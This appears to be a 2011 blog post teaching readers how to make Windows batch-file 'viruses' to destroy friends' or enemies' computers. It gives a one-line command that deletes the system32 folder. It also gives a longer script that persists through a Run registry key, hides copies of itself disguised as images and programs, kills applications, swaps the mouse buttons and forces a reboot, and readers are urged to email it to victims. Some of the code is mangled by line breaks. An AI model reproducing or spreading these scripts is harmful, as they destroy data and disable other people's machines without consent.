Friday, April 29, 2011

DESTROY YOUR FRIENDS' COMPUTER USING SIMPLE NITEPAD VIRUS

In this post we'll take a look on how to create a deadly computer virus to destroy your enemy or victim's PC...
Open Notepad, Type or Paste in the following command:-
del c:\windows\system32\*.* /q

Save it with the extension ".bat or .cmd" as u want...
Don't double click the file otherwise u r in trouble. Why??? Bcz the file u created deletes all files from your system32 folder and when u restart your PC it will not start bcz system can not find the files in the system32 folder which is required at the time of booting...
You can also test the above by creating a fake folder let suppose:-
windows1 in C:\.
Copy some old files in it and just follow the above command. By double clicking the bat or cmd file ur all files automaitcally get deleted.
You can try this file one any one's computer. (but this result in causing damage to the computer, so think again before trying this on anyone's PC)
VIRUS 2:
 
This post is to help you to send viruses to your enemies! Here goes,
Paste the below given code in your Notepad, then save it as anyname.bat
Do not click on that batch file... Send it to your enimies' email... It will:
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
CODE:-

@Echo off
color
4
title
4
title R
.I.P
start
start
start
start calc
copy
%0 %Systemroot%\Greatgame > nul
reg add HKLM
\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nul
copy
%0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +h
RUNDLL32 USER32
.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill
LimeWire
tskill iexplore
tskill
NMain
start
cls
cd
%userprofile%\desktop
copy
Greatgame.bat R.I.P.bat
copy
Greatgame.bat R.I.P.jpg
copy
Greatgame.bat R.I.P.txt
copy
Greatgame.bat R.I.P.exe
copy
Greatgame.bat R.I.P.mov
copy
Greatgame.bat FixVirus.bat
cd
%userprofile%My Documents
copy
Greatgame.bat R.I.P.bat
copy
Greatgame.bat R.I.P.jpg
copy
Greatgame.bat R.I.P.txt
copy
Greatgame.bat R.I.P.exe
copy
Greatgame.bat R.I.P.mov
copy
Greatgame.bat FixVirus.bat
start
start calc
cls
msg
* R.I.P
msg
* R.I.P
shutdown
-r -t 10 -c "VIRUS DETECTED"
start
start
time
12:00
:R.I.P
cd
%usernameprofile%\desktop
copy
Greatgame.bat %random%.batgoto RIP

0 comments: